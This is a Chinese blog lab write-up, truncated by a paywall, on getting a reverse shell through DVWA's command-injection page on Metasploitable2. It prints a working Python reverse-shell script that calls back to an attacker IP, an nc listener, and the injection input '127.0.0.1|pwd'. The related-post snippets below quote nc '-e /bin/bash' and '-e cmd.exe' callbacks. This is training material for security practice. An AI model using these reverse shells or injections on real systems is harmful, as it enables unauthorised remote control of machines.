【DVWA】反弹shell实验

最新推荐文章于 2024-04-23 21:45:00 发布
最新推荐文章于 2024-04-23 21:45:00 发布
阅读量1.2k 收藏 3
点赞数 1
分类专栏: WEB安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42288123/article/details/103533011
版权

反弹shell实验

实验环境:metasploitable2;dvwa-linux版

操作过程

  1. 进入kali的web服务根目录/var/www/html,写入getshell.py的python程序

    #leafpad getshell.py

import socket,subprocess,os
s=socket. socket( socket.AF_INET , socket. SOCK_STREAM)
s. connect(("192.168.5.128", 1234) )	#CHANGE THIS
os.dup2(s. fileno() ,0)
os.dup2(s. fileno() ,1)
os.dup2(s. fileno() ,2)
p=subprocess. call(["/bin/bash","-i"] )

  2. 在kali中使用shell命令/etc/init.d/apache2 start开启apache服务

  3. 在kali中监听1234端口nc -vnlp 1234

  4. 打开浏览器,进入DVWA中,在命令执行中输入127.0.0.1|pwd得到命令执行漏洞路径在这里插入图片描述

  5. metasploitable2中进入/var/www/dvwa/vulnerabilities/exec路径中,下载getshell.py

最低0.47元/天 解锁文章
super小明
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
手工挖洞学习笔记:dvwa命令执行漏洞/载入php反弹shell
AI_Jardon的博客
08-13 1285
命令执行漏洞 工具: (1)靶机:Metasploitable2 (2)nc (3)kali dvwa 代码审计:安全级别为low <?php if( isset( $_POST[ 'Submit' ] ) ) { // Get input $target = $_REQUEST[ 'ip' ]; // Determine OS and execute the ping command. if( stristr( php_uname( 's' ), 'Wi
命令执行漏洞详解及DVWA靶场练习
c_programj的博客
06-25 2895
命令执行漏洞1.产生原因2.漏洞危害3.远程命令执行4.系统命令执行命令执行常用特殊字符5.常见 命令常见系统命令与功能windowslinux6.防范措施7.dvwa靶场练习windows【Low】【Medium】【High】【Impossible】linux【low】【Medium】【High】 1.产生原因 应用未对用户输入做严格的检查过滤,导致用户输入的参数被当成命令来执行。攻击者可以任意执行系统命令,属于高危漏洞之一,也属于代码执行的范畴。 RCE:远程命令和代码执行。 2.漏洞危害 ①继承web
docker-dvwa:DVWA的Docker Compose设置
03-06
Dockerized DVWA在Dockerhub上有可用的官方Docker映像,但是编写此映像时,该映像已有2年未收到任何更新。 如果您希望始终使用最新版本,请使用此处提供的Docker Compose设置。 映像将始终根据存储库的最新主分支在。 :party_popper: 安装 下载存储库并复制.env文件 git clone https://github.com/cytopia/docker-dvwa cd docker-dvwa cp .env-example .env :high_voltage: 开始 make start :prohibited: 停止 make stop :laptop: 用法 网址: 用户: admin password : password 您还可以通过以下方法在Web服务器容器上获取​​外壳程序: make enter :wrench: 配置 通过此设置,您可以通过.env文件配置一些设置。 多变的 默认 设定值 LISTE
自动化在centos7上搭建DVWA靶场,shell脚本
11-22
自动化在centos7上搭建DVWA靶场,注意文件不要在windows下编辑 自动化在centos7上搭建DVWA靶场,注意文件不要在windows下编辑 自动化在centos7上搭建DVWA靶场,注意文件不要在windows下编辑
网络安全-反弹shell详解(攻击,检测与防御)
最新发布
2401_84466336的博客
04-23 2293
1.1 什么是 ShellShell 在计算机系统中指的是一个用户界面,用于访问操作系统的服务。在网络安全中,攻击者常利用 Shell 来控制受害者的系统。1.2 反弹 Shell 的工作原理反弹 Shell 的基本原理是:攻击者在其自己的机器上设置监听端口,然后诱使受害者的机器执行一个反向连接的 Shell 命令,连接回攻击者的机器。这样,攻击者就能通过这个反向连接执行命令,控制受害者的计算机。
DVWA通关手册.docx
08-19
文档内部包含DVWA平台,所有类型漏洞低中高等级的攻击过程,非常仔细。也有部分自己的攻击方法,值得一试。
DVWA Command Injection(命令注入)全等级
柠檬i的博客
12-19 2268
目录:Command Injection(命令注入)1. Low利用1.nc反弹shell2.msf上马2.Medium3. High4.Impossible Command Injection(命令注入) 逻辑运算符“&”和“|”的意思 &&:代表首先执行命令a在执行命令b,但是前提条件是命令a执行正确才会执行命令b,在a执行失败的情况下不会执行b命令。所以又被称为短路运算符。 &:代表首先执行命令a在执行命令b,如果a执行失败,还是会继续执行命令b。也就是说命令
DVWA_File Inclusion 文件包含 远程文件包含拿webshell
weixin_30929195的博客
11-03 170
MEDIUM: $file = str_replace( array( "http://", "https://" ), "", $file ); $file = str_replace( array( "../", "..\"" ), "", $file );   与LOW相比,将四个敏感字符串过滤掉了:"http://", "https://","....
渗透测试-文件包含漏洞以及php伪协议的应用
lza20001103的博客
07-20 3035
渗透测试-文件包含漏洞以及php伪协议的应用
PHP后门反弹连接DVWA
m0_57379855的博客
03-31 3266
PHP后门反弹连接DVWA环境准备操作系统准备DVWA靶场准备metasploit配置监控及攻击载荷配置监控配置攻击载荷生成php后门上传后门文件后渗透获取数据库信息 环境准备 操作系统准备 kali : 192.168.202.133 win10:192.168.202.139 DVWA靶场准备 DVWA下载 注意:配置DVWA环境 准备PHP7.0以上,和 Nginx环境 设置网站 配置数据库密码 与数据库设置保持一致 metasploit配置监控及攻击载荷 配置监控 使用handle
WEB安全实战(带靶场)–命令执行
renxq097的博客
12-27 1461
CTF靶场实验:命令注入
DVWA靶场搭建与使用
09-02
DVWA靶场搭建
DVWA Installation
08-15
DVWA all package. DVWA-master.zip
使用Metasploit web_delivery 反弹shell
大方子
02-07 5359
Metasploit的Web Delivery Script是一个多功能模块,可在托管有效负载的攻击机器上创建服务器。当受害者连接到攻击服务器时,负载将在受害者机器上执行。 此漏洞需要一种在受害机器上执行命令的方法。特别是你必须能够从受害者到达攻击机器。远程命令执行是使用此模块的攻击向量的一个很好的例子。Web Delivery脚本适用于php,python和基于PowerShell的应用程序。 当攻击者对系统有一定的控制权时,这种攻击成为一种非常有用的工具,但不具有完整的shell。另外,由于服务器和有效
反弹shell
weixin_45676689的博客
11-05 247
Nc 在物理机开启1234端口并监听,在cmd输入:nc.exe -lvvp 1234 在被攻击者(windows)电脑cmd中输入:nc.exe 192.168.31.201 1234 -e cmd.exe 在物理机就可以看到反弹过来的shell,也能执行命令 如果用linux反弹shell,输入:nc 192.168.31.201 1234 -e /bin/bash 在物理机也能看...
获取完美shell
em.....
06-01 668
微信公众号:小惜渗透,欢迎大佬一起交流进步 下面我将边演示边来介绍几种提升shell的方法,我这里面用的Linux虚拟机搭的DVWA靶场上传文件(吐槽一下,在windows上用小皮面板搭建一点问题没有,在Linux上可能因为权限的问题,文件上传那块正常的图片就死活传不上去,后来自己一顿调,本来都想放弃了,结果瞎调调好了)首先我这里用哥斯拉打开命令界面这时候可以通过方向上键回历史记录,但是一些需要交互的命令,如su或者vim都会执行失败,那么我们首先想到的肯定是反弹shell反弹shell的命令大全,我公众
DVWA-命令注入漏洞获取目标shell并提到最高权限[msfvenom]
King_Ho的博客
12-21 2769
MSF攻击Windows实验: 方法一 :通过web站点,使用无文件的方式攻击利用执行 方法二:通过web站点,上传webshell, 返回给msf 方法三:攻击其他端口服务,拿到meterpreter 信息收集-Nmap端口扫描 信息收集总在前 root@kali:~# nmap -sV -T4 xxx.xxx.xxx.xxx Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-29 10:46 CST Not shown: 992 filtered p
命令注入反弹shell
-
05-23 358
命令注入反弹shell dvwa
第十三章—手动漏洞挖掘(二)
weixin_43876557的博客
01-18 535
身份认证 面对web application的登录。
dvwa的csrf实验
05-16
DVWA是一个用于测试Web应用程序安全性的漏洞测试平台,其中包括了一些常见的Web安全漏洞实验,其中包括CSRF攻击实验。下面是实现DVWA的CSRF攻击的步骤: 1. 打开DVWA漏洞测试平台,进入CSRF攻击实验页面。 2. 在...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值